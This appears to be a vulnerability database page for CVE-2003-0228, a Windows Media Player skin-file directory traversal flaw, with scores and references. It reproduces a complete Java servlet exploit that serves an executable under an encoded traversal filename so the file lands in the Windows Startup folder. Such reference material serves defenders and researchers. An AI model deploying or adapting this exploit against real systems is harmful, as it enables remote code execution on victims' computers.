CVE-2003-0228 : Detail

CVE-2003-0228

95.32%V3
Network
2003-05-08
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 22570

Publication date : 2003-05-06 22h00 +00:00
Author : Jelmer Kuperus
EDB Verified : Yes

source: https://www.securityfocus.com/bid/7517/info Windows Media Player is vulnerable to code execution through skin files. WMP does not properly validate URLs that are passed to initiate a skin file download and installation. This could allow a malicious file advertised as a skin file to be downloaded to a known location and executed through some other means. import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.ServletException; import javax.servlet.ServletOutputStream; import java.io.*; /** * * Microsoft media player 8 Exploit for windows XP English and Dutch versions * * It will drop a file in the startup folder * * modify web.xml to change what will be uploaded * * @author Jelmer Kuperus * */ public class MediaPlayerExploit extends HttpServlet { private static final int BUFFER_SIZE = 1024; private static final String[] paths = new String[] { "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", // English "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Start%5CProgramma%27s%5Copstarten%5c" // Dutch }; private String payload; public void init() throws ServletException { payload = getInitParameter("executable"); } public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { int language = 0; // default to english try { language = Integer.parseInt(request.getParameter("language")); } catch (NumberFormatException ignored) {} String path = paths[language]; File file = new File(payload); ServletOutputStream sos = response.getOutputStream(); response.setContentType("application/download"); response.setHeader("Content-Disposition","filename=" + path + file.getName() + "%00.wmz"); BufferedInputStream bis = new BufferedInputStream(new FileInputStream(file)); BufferedOutputStream bos = new BufferedOutputStream(sos); byte buffer[] = new byte[BUFFER_SIZE]; int datalength = 0; while ( (datalength = bis.read(buffer,0,BUFFER_SIZE)) > 0) { bos.write(buffer,0,datalength); } bis.close(); bos.close(); } public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doGet(request, response); } }

Products Mentioned

Configuraton 0

Microsoft>>Windows_media_player >> Version -

Microsoft>>Windows_media_player >> Version 7.1

References

http://marc.info/?l=bugtraq&m=105232913516488&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/7517
Tags : vdb-entry, x_refsource_BID
http://marc.info/?l=ntbugtraq&m=105233960728901&w=2
Tags : mailing-list, x_refsource_NTBUGTRAQ
http://www.kb.cert.org/vuls/id/384932
Tags : third-party-advisory, x_refsource_CERT-VN
http://marc.info/?l=bugtraq&m=105240528419389&w=2
Tags : mailing-list, x_refsource_BUGTRAQ